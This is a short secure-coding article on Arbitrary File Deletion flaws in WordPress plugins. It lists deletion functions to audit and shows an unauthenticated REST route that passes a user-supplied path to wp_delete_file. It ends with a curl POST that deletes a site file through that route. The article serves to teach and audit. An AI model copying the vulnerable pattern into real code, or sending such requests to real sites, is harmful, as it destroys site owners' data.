Arbitrary File Deletion

Introduction

This article covers cases of possible Arbitrary File Deletion on WordPress. This includes improper file or directory deletion handling inside of the plugin/theme which can be used to delete arbitrary local files and directories inside of the server.

Learn how to secure your code against Arbitrary File Deletion

Useful Functions

Several functions could be useful to identify a possible Arbitrary File Deletion vulnerability:

• PHP related

  • unlink
  • rmdir

• WordPress related

  • wp_delete_file
  • wp_delete_file_from_directory
  • WP_Filesystem_Direct::delete
  • WP_Filesystem_Direct::rmdir

Example Cases

Below is an example of vulnerable code:

add_action("init", "rest_init_setup");

function rest_init_setup(){
    register_rest_route( "myplugin/v1", '/deletemedia/', array(
        'methods'                   =>  "POST",
        'callback'                  =>  'delete_media_upload',
        'permission_callback' => '__return_true',
    ) );
}

function delete_media_upload($request){
    $args = json_decode($request->get_body(),true);
    $data = array('status'=>false);
    if(!empty($args['media']) ){
        wp_delete_file( $args['media']['file'] );
        $data = array('status'=>true);
    }
    return new WP_REST_Response( $data, 200 );
}

To exploit this, any unauthenticated user just needs to perform a POST request to the /wp-json/myplugin/v1/deletemedia endpoint specifying the needed parameter to trigger the wp_delete_file function.

curl <WORDPRESS_BASE_URL>/wp-json/myplugin/v1/deletemedia -d '{"media":{"file":"<WORDPRESS_BASE_DIRECTORY>/license.txt"}}' -H 'Content-Type: application/json'